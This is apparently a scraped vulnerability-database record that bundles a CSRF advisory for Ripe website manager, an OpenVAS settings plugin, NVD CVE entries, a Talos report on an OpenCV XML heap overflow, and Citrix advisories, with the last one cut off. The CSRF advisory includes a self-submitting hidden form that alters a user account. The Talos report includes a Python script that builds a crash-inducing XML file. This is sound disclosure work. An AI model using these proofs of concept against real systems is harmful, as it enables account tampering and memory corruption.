{"id": "SECURITYVULNS:DOC:26000", "bulletinFamily": "software", "title": "HTB22898: XSRF (CSRF) in Ripe website manager", "description": "Vulnerability ID: HTB22898\r\nReference: http://www.htbridge.ch/advisory/xsrf_csrf_in_ripe_website_manager.html\r\nProduct: Ripe website manager\r\nVendor: Ripe website manager Team ( http://www.ripewebsitemanager.com/ ) \r\nVulnerable Version: 1.1 and probably prior versions\r\nVendor Notification: 10 March 2011 \r\nVulnerability Type: CSRF (Cross-Site Request Forgery)\r\nRisk level: Low \r\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) \r\n\r\nVulnerability Details:\r\nThe vulnerability exists due to failure in the "ripe/modules/members/admin.php" script to properly verify the source of HTTP request.\r\n\r\nSuccessful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.\r\n\r\nAttacker can use browser to exploit this vulnerability. The following PoC is available:\r\n\r\n<form action="http://host/ripe/?v=5&a=2&id=USERID" method="post" name="main">\r\n<input type="hidden" name="actionformSubmit" value="1">\r\n<input type="hidden" name="x" value="1">\r\n<input type="hidden" name="y" value="1">\r\n<input type="hidden" name="ripe_user" value="test">\r\n<input type="hidden" name="ripe_name" value="test test">\r\n<input type="hidden" name="ripe_email" value="email@example.com">\r\n<input type="hidden" name="ripe_group" value="2">\r\n<input type="hidden" name="ripe_new_pass" value="">\r\n<input type="hidden" name="ripe_new_pass2" value="">\r\n\r\n<input type="hidden" name="a_pages" value=" ">\r\n<input type="hidden" name="a_menus" value=" ">\r\n<input type="hidden" name="a_files" value=" ">\r\n<input type="hidden" name="a_stats" value=" ">\r\n<input type="hidden" name="a_forms" value=" ">\r\n<input type="hidden" name="a_adverts" value=" ">\r\n<input type="hidden" name="a_users" value=" ">\r\n<input type="hidden" name="a_templates" value=" ">\r\n\r\n<input type="hidden" name="change" value="change">\r\n<input type="hidden" name="id" value="USERID">\r\n\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n\r\n", "published": "2011-03-25T00:00:00", "modified": "2011-03-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26000", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:39", "edition": 1, "viewCount": 13, "enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2018-08-31T11:10:39", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB4022130"]}, {"type": "cve", "idList": ["CVE-2008-7273", "CVE-2014-2595", "CVE-2015-9286", "CVE-2008-7272"]}, {"type": "talos", "idList": ["TALOS-2019-0852"]}, {"type": "symantec", "idList": ["SMNTC-108801"]}, {"type": "nessus", "idList": ["CITRIX_NETSCALER_CTX240139.NASL"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:D3F80C640B03474D91F23DCB50FFEA6D"]}, {"type": "zdt", "idList": ["1337DAY-ID-28762", "1337DAY-ID-27954"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144558", "PACKETSTORM:142939"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1C3EE18F5FDEC5CA6AA94E14CA9E7563", "EXPLOITPACK:8879BE080DB0C0FD1AB29CF8169D7CC8"]}, {"type": "exploitdb", "idList": ["EDB-ID:42175", "EDB-ID:42963"]}, {"type": "ciscothreats", "idList": ["CISCO-THREAT-54153", "CISCO-THREAT-54155"]}, {"type": "krebs", "idList": ["KREBS:E7885E83474AB6F6BDDCF4C023EB59F0"]}], "modified": "2018-08-31T11:10:39", "rev": 2}, "vulnersScore": 6.0}, "affectedSoftware": []}

{"openvas": [{"lastseen": "2020-12-22T16:03:08", "bulletinFamily": "scanner", "cvelist": [], "description": "Set login parameters for scanning openGauss database.", "modified": "2020-12-22T00:00:00", "published": "2020-11-12T00:00:00", "id": "OPENVAS:1361412562310150403", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310150403", "type": "openvas", "title": "openGauss: Authentication Parameters", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.150403\");\n script_version(\"2020-12-22T08:36:56+0000\");\n script_tag(name:\"last_modification\", value:\"2020-12-22 08:36:56 +0000 (Tue, 22 Dec 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-11-12 07:11:36 +0000 (Thu, 12 Nov 2020)\");\n script_tag(name:\"cvss_base\", value:\"0.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:S/C:N/I:N/A:N\");\n script_tag(name:\"qod\", value:\"97\");\n\n script_name(\"openGauss: Authentication Parameters\");\n\n script_category(ACT_SETTINGS);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Compliance\");\n\n script_add_preference(name:\"Database\", type:\"entry\", value:\"postgres\", id:1);\n script_add_preference(name:\"Port\", type:\"entry\", value:\"26000\", id:2);\n # Use 'su - USER' option for gsql command\n script_add_preference(name:\"Use 'su - USER' option on gsql commands\", type:\"radio\", value:\"no;yes\", id:3);\n\n # Specify user for 'su - USER' option above\n script_add_preference(name:\"Use this user for 'su - USER' option on gsql commands\", type:\"entry\", value:\"\", id:4);\n\n script_xref(name:\"URL\", value:\"https://opengauss.org\");\n\n script_tag(name:\"summary\", value:\"Set login parameters for scanning openGauss database.\");\n\n exit(0);\n}\n\ndatabase = script_get_preference( \"Database\", id:1 );\nif ( database && database != \"\" )\n set_kb_item( name:\"Policy/opengauss/database\", value:database );\nelse\n set_kb_item( name:\"Policy/opengauss/database\", value:\"postgres\" );\n\nport = script_get_preference( \"Port\", id:2 );\nif ( port && port != \"\" )\n set_kb_item( name:\"Policy/opengauss/port\", value:port );\nelse\n set_kb_item( name:\"Policy/opengauss/port\", value:\"26000\" );\n\nuse_su = script_get_preference(\"Use 'su - USER' option on gsql commands\", id:3);\nsu_user = script_get_preference(\"Use this user for 'su - USER' option on gsql commands\", id:4);\n\nif( use_su && \"yes\" >< use_su ) {\n\n # nb: We're using \"yes\" / \"no\" here so that we can overwrite\n # it later in gather-package-list.nasl again.\n set_kb_item( name:\"Policy/opengauss/use_su\", value:\"yes\" );\n\n if( ! isnull( su_user ) ) {\n if( ! su_user ) {\n # Do not use 'su -' option if no user is specified\n replace_kb_item( name:\"Policy/opengauss/use_su\", value:\"no\" );\n } else {\n set_kb_item( name:\"Policy/opengauss/su_user\", value:su_user );\n }\n } else {\n # Do not use 'su -' option if no user is specified\n replace_kb_item( name:\"Policy/opengauss/use_su\", value:\"no\" );\n }\n}\n\nexit(0);", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "talos": [{"lastseen": "2021-01-05T01:22:36", "bulletinFamily": "info", "cvelist": ["CVE-2019-5063"], "description": "# Talos Vulnerability Report\n\n### TALOS-2019-0852\n\n## OpenCV XML Persistence Parser Buffer Overflow Vulnerability\n\n##### January 2, 2020\n\n##### CVE Number\n\nCVE-2019-5063\n\n### Summary\n\nAn exploitable heap buffer overflow vulnerability exists in the data structure persistence functionality of OpenCV 4.1.0. A specially crafted XML file can cause a buffer overflow, resulting in multiple heap corruptions and potential code execution. An attacker can provide a specially crafted file to trigger this vulnerability.\n\n### Tested Versions\n\nOpenCV 4.1.0\n\n### Product URLs\n\n[https://opencv.org/] (https://opencv.org/) \n[https://github.com/opencv/opencv] (https://github.com/opencv/opencv)\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-120 - Buffer Copy without Checking Size of Input (\u2018Classic Buffer Overflow\u2019)\n\n### Details\n\nOpenCV was originally developed in 1999 by Intel Research and is currently maintained by the non-profit organization OpenCV.org. OpenCV is used in a myriad of ways, including facial recognition, robotics, motion tracking and various machine learning applications.\n\nThis particular vulnerability is present in the \u201cpersistence\u201d mode of OpenCV that allows a developer to write and retrieve OpenCV data structures to/from a file on disk. The file type can be XML, YAML or JSON.\n\nDuring parsing of a XML file containing a potential character entity reference, when the ampersand is encountered, the API will continue to digest alphanumeric characters until a semicolon is encountered. If the string does not match one of the strings in the switch statement, the data is instead copied to a buffer as is.\n\nIn `persistence_xml.cpp`, we can see the definition of the buffer that will be overflowed which resides within a FileStorageParser class on the heap.\n \n \n char strbuf[CV_FS_MAX_LEN+16];\n \n\nWhere `persistence.hpp` defines `CV_FS_MAX_LEN` as:\n \n \n 44 #define CV_FS_MAX_LEN 4096\n \n\nTherefore, our buffer size is 0x1010 (4112) bytes in length. The overflow occurs during the following parsing routine within `persistence_xml.cpp`:\n \n \n 583 else if( c == '&' )\n 584 {\n 585 if( *++ptr == '#' )\n 586 {\n 587 int val, base = 10;\n 588 ptr++;\n 589 if( *ptr == 'x' )\n 590 {\n 591 base = 16;\n 592 ptr++;\n 593 }\n 594 val = (int)strtol( ptr, &endptr, base );\n 595 if( (unsigned)val > (unsigned)255 ||\n 596 !endptr || *endptr != ';' )\n 597 CV_PARSE_ERROR_CPP( \"Invalid numeric value in the string\" );\n 598 c = (char)val;\n 599 }\n 600 else\n 601 {\n 602 endptr = ptr;\n 603 do c = *++endptr;\n 604 while( cv_isalnum(c) );\n 605 if( c != ';' )\n 606 CV_PARSE_ERROR_CPP( \"Invalid character in the symbol entity name\" );\n 607 len = (int)(endptr - ptr);\n 608 if( len == 2 && memcmp( ptr, \"lt\", len ) == 0 )\n 609 c = '<';\n 610 else if( len == 2 && memcmp( ptr, \"gt\", len ) == 0 )\n 611 c = '>';\n 612 else if( len == 3 && memcmp( ptr, \"amp\", len ) == 0 )\n 613 c = '&';\n 614 else if( len == 4 && memcmp( ptr, \"apos\", len ) == 0 )\n 615 c = '\\'';\n 616 else if( len == 4 && memcmp( ptr, \"quot\", len ) == 0 )\n 617 c = '\\\"';\n 618 else\n 619 {\n 620 memcpy( strbuf + i, ptr-1, len + 2 );\n 621 i += len + 2;\n 622 }\n 623 }\n \n\nThe overflow occurs at line 620. It happens because the buffer is a fixed size, but the size for the memcpy is calculated as the length of the entire XML entity value (line 596) without checking if it extends beyond the target buffer.\n\n### Crash Information\n\nWe can see the vulnerable memcpy operation occur here:\n \n \n 0x41f71f call memcpy@plt <0x406470>\n dest: 0x91c380 \u25c2\u2014 0x676e69727400\n src: 0x911e15 \u25c2\u2014 0x4242424242422026 ('& BBBBBB')\n n: 0x2c83\n \n\nIf the buffer size is only 0x1010 (4112) bytes, and the memcpy size (the entire value of one of the entity reference string) is 0x2c83 (11395) bytes, there will be an overflow into subsequent heap objects, leading to potential code execution.\n\nThe destination buffer is located within the \u2018FileStorageParser` object itself:\n \n \n type = class cv::XMLParser : public cv::FileStorageParser {\n public:\n cv::FileStorage_API *fs;\n char strbuf[4112];\n \n XMLParser(cv::FileStorage_API *);\n virtual ~XMLParser(void);\n char * skipSpaces(char *, int);\n virtual bool getBase64Row(char *, int, char *&, char *&);\n char * parseValue(char *, cv::FileNode &);\n char * parseTag(char *, std::__cxx11::string &, std::__cxx11::string &, int &);\n virtual bool parse(char *);\n } *\n \n\nIn this particular case, the heap object for this instance is located at 0x91c350. The buffer is located at 0x91c380.\n \n \n Heap chunk: 0x91c358 (malloc address)\n Heap chunk header: 0x91c350\n Size: 0x1040 (4160)\n Size+Hdr: 0x1050 (4176)\n Status: in USE\n Prev size field: 0x0 (0)\n Raw Size: 0x1041 (4161)\n Flags: PREV_INUSE\n \n 000000000091c340: 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .@..............\n 000000000091c350: 00 00 00 00 00 00 00 00 41 10 00 00 00 00 00 00 ........A.......\n 000000000091c360: 48 3f 8e 00 00 00 00 00 01 00 00 00 01 00 00 00 H?..............\n 000000000091c370: 98 3f 8e 00 00 00 00 00 60 04 91 00 00 00 00 00 .?......`.......\n ....\n 000000000091d380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 000000000091d390: 00 00 00 00 00 00 00 00 21 00 00 00 00 00 00 00 ........!.......\n \n\nThe next object in the heap is located at 0x91d390 which is exactly 0x1040 (4160) bytes away:\n \n \n Heap chunk: 0x91d398 (malloc address)\n Heap chunk header: 0x91d390\n Size: 0x20 (32)\n Size+Hdr: 0x30 (48)\n Status: in USE\n Prev size field: 0x0 (0)\n Raw Size: 0x21 (33)\n Flags: PREV_INUSE\n \n 000000000091d380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 000000000091d390: 00 00 00 00 00 00 00 00 21 00 00 00 00 00 00 00 ........!.......\n ....\n 000000000091d3a0: 00 73 74 72 69 6e 67 73 00 00 00 00 00 00 00 00 .strings........\n 000000000091d3b0: 00 00 00 00 00 00 00 00 51 1c 00 00 00 00 00 00 ........Q.......\n \n\nHere are the objects after the memcpy() operation:\n \n \n Heap chunk: 0x91c358 (malloc address)\n Heap chunk header: 0x91c350\n Size: 0x1040 (4160)\n Size+Hdr: 0x1050 (4176)\n Status: is FREE\n FD: 0x8e3f48\n BK: 0x100000001\n Prev size field: 0x0 (0)\n Raw Size: 0x1041 (4161)\n Flags: PREV_INUSE\n \n 000000000091c340: 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .@..............\n 000000000091c350: 00 00 00 00 00 00 00 00 41 10 00 00 00 00 00 00 ........A.......\n 000000000091c360: 48 3f 8e 00 00 00 00 00 01 00 00 00 01 00 00 00 H?..............\n 000000000091c370: 98 3f 8e 00 00 00 00 00 60 04 91 00 00 00 00 00 .?......`.......\n ....\n 000000000091d380: 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB\n 000000000091d390: 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB\n \n\nThe heap object at 0x91d390 has clearly been corrupted.\n \n \n 0x91d390:\t0x4242424242424242\t0x4242424242424242\n 0x91d3a0:\t0x4242424242424242\t0x4242424242424242\n 0x91d3b0:\t0x4242424242424242\t0x4242424242424242\n 0x91d3c0:\t0x4242424242424242\t0x4242424242424242\n 0x91d3d0:\t0x4242424242424242\t0x4242424242424242\n 0x91d3e0:\t0x4242424242424242\t0x4242424242424242\n 0x91d3f0:\t0x4242424242424242\t0x4242424242424242\n 0x91d400:\t0x4242424242424242\t0x4242424242424242\n \n\nThe heap segment extends from 0x8f9000 to 0x91f000 (in this instance). This specific variant of the attack will trigger an access violation because an attempt to copy data beyond the heap segment will occur.\n \n \n 0x8f9000 0x91f000 rw-p 26000 0 [heap]\n \n \n Program received signal SIGSEGV, Segmentation fault.\n __memmove_sse2_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:481\n 481\t\tVMOVU\t%VEC(8), (%r11)\n \n\n### Exploit Proof of Concept\n\nGenerate a malicious XML file:\n \n \n #!/usr/bin/env python\n from struct import pack\n \n poc = b'<?xml version=\"1.0\"?><opencv_storage><strings>'\n poc += b'string'\n poc += b' & '\n poc += b'B' * 0x2c80\n \n # Required\n poc += b';'\n poc += b'</strings>'\n with open(\"poc.xml\", \"wb\") as f:\n f.write(poc)\n f.close()\n \n\nCompile the harness to load the file:\n \n \n #include \"opencv2/core.hpp\"\n /*\n * harness.cpp\n * g++ -I/usr/include/opencv4/ harness.cpp -o harness -l opencv_core\n */\n \n int main(int argc, char** argv) {\n cv::FileStorage fs2(argv[1], cv::FileStorage::READ);\n fs2.release();\n return 0;\n }\n \n\nExecution: $ ./harness poc.xml [1] 24290 segmentation fault (core dumped) ./harness poc.xml\n\n### Timeline\n\n2019-07-22 - Initial contact \n2019-07-30 - Plain text report issued \n2019-10-02 - 60+ day follow up \n2019-10-21 - 90 day follow up \n2019-11-13 - Vendor confirmed fix planned for December 2019 release \n2019-12-12 - Talos granted extension to public disclosure deadline \n2019-12-19 - Vendor patched \n2020-01-02 - Public Release\n\n##### Credit\n\nDiscovered by Dave McDaniel of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2019-0973\n\nPrevious Report\n\nTALOS-2019-0853\n", "edition": 6, "modified": "2020-01-02T00:00:00", "published": "2020-01-02T00:00:00", "id": "TALOS-2019-0852", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0852", "title": "OpenCV XML Persistence Parser Buffer Overflow Vulnerability", "type": "talos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "citrix": [{"lastseen": "2020-11-20T13:42:08", "bulletinFamily": "software", "cvelist": ["CVE-2019-0140"], "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n<h2> Description of Problem</h2>\n<div>\n<div>\n<div>\n<p>A vulnerability has been identified affecting Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC, and Citrix Gateway, formerly known as NetScaler Gateway, platforms which could result in privilege escalation via layer 2 network access on all network interfaces.</p>\n<p>This vulnerability has been assigned the following CVE:</p>\n<p>\u2022 CVE-2019-0140: Buffer overflow in firmware for Intel(R) Ethernet 700 Series Controllers</p>\n<p> </p>\n<p>The following MPX/SDX series are affected:</p>\n<p>\u2022 8900</p>\n<p>\u2022 14000-40G/14000-40S/14000-40C</p>\n<p>\u2022 15000-25G/15000-50G</p>\n<p>\u2022 25000-40G</p>\n<p>\u2022 26000/26000-50G</p>\n<p>Only 10G/25G/40G ports are affected by this vulnerability.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Mitigating Factors</h2>\n<div>\n<div>\n<div>\n<p>An attacker must have Layer 2 access to leverage this vulnerability, therefore limiting the exposure to peer switch access. This issue is mitigated if Link Layer Discovery Protocol (LLDP) is disabled at the peer switch connecting the MPX/SDX.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> What Customers Should Do</h2>\n<div>\n<div>\n<div>\n<p>Customers with affected versions of Citrix ADC MPX are recommended to upgrade the appliance firmware to one of the following versions:</p>\n<ul>\n<li>13.0 build 58.30 and later</li>\n<li>12.1 build 56.22 and later</li>\n<li>11.1 build 64.11 and later</li>\n</ul>\n<p>Customers must then upgrade the network interface card firmware by following the guidance in the following article: <a href=\"https://docs.citrix.com/en-us/citrix-hardware-platforms/mpx/fortville-nic-firmware-upgrade.html\" title=\"https://docs.citrix.com/en-us/citrix-hardware-platforms/mpx/fortville-nic-firmware-upgrade.html\">https://docs.citrix.com/en-us/citrix-hardware-platforms/mpx/fortville-nic-firmware-upgrade.html</a>.</p>\n<p>Please note that after the network interface card firmware version is upgraded on the MPX, customers can no longer downgrade the appliance firmware to anything before the aforementioned versions.</p>\n<p> </p>\n<p>Customers with affected versions of Citrix ADC SDX are recommended to upgrade the appliance firmware to a version which includes a firmware update for the vulnerable network interface card:</p>\n<ul>\n<li>13.0 build 58.30 and later</li>\n<li>12.1 build 57.18 and later</li>\n<li>11.1 build 65.10 and later</li>\n</ul>\n<p>Please note, that customers must first upgrade any VPX instances running on the appliance and then upgrade the SVM. More details are available in the following article: <a href=\"https://docs.citrix.com/en-us/citrix-hardware-platforms/sdx/fortville-nic-firmware-upgrade-on-sdx.html\" title=\"https://docs.citrix.com/en-us/citrix-hardware-platforms/sdx/fortville-nic-firmware-upgrade-on-sdx.html\">https://docs.citrix.com/en-us/citrix-hardware-platforms/sdx/fortville-nic-firmware-upgrade-on-sdx.html</a>. </p>\n<p>Alternatively, customers who are unable to upgrade are strongly recommended to Disable Link Layer Discovery Protocol (LLDP) at the peer switch connecting the MPX or SDX.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> What Citrix Is Doing</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix is notifying customers and channel partners about this potential security issue. This article is also available from the Citrix Knowledge Center at <u> <a href=\"http://support.citrix.com/\">http://support.citrix.com/</a></u>.</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Obtaining Support on This Issue</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"https://www.citrix.com/support/open-a-support-case.html\">https://www.citrix.com/support/open-a-support-case.html</a></u>. </p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Reporting Security Vulnerabilities</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"http://support.citrix.com/article/CTX081743\">Reporting Security Issues to Citrix</a></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Changelog</h2>\n<div>\n<div>\n<div>\n<table width=\"100%\">\n<tbody>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">Date </td>\n<td colspan=\"1\" rowspan=\"1\">Change</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">2019-11-12</td>\n<td colspan=\"1\" rowspan=\"1\">Initial Publication</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">2020-10-21</td>\n<td colspan=\"1\" rowspan=\"1\">Updated guidance</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\n</div></div>\n</section>", "modified": "2020-10-21T04:00:00", "published": "2019-11-12T04:00:00", "id": "CTX263807", "href": "https://support.citrix.com/article/CTX263807", "type": "citrix", "title": "Citrix ADC and Citrix Gateway Security Update (CVE-2019-0140)", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-20T15:42:16", "bulletinFamily": "software", "cvelist": ["CVE-2019-6485"], "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"DescriptionofProblem\"> Description of Problem</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<p>A vulnerability has been identified in the Citrix Application Delivery Controller (ADC) formally known as NetScaler ADC and NetScaler Gateway platforms using hardware acceleration that could allow an attacker to exploit the appliance to decrypt TLS traffic. This vulnerability does not directly allow an attacker to obtain the TLS private key.</p>\n<p>This vulnerability has been assigned the following CVE:</p>\n<p>\u2022 CVE-2019-6485: TLS Padding Oracle Vulnerability in Citrix Application Delivery Controller (ADC) and NetScaler 